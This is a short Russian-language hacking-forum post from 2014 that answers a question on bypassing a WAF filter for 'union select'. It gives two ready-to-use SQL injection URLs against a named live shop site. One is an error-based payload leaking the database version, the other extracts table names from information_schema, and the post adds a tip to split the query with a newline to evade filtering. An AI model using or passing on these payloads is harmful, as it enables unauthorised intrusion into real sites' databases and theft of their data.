15.12.2014, 02:12
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Br@!ns
не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+g roup+by+left(version(),@:=~@)having+min(0)
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+or+1+grou p+by+concat((select+table_name+%0A+from+informatio n_schema.tables+limit+1,1),floor(rand(0)*2))having +min(0)
разбиваем запрос переносом строки
|
|
|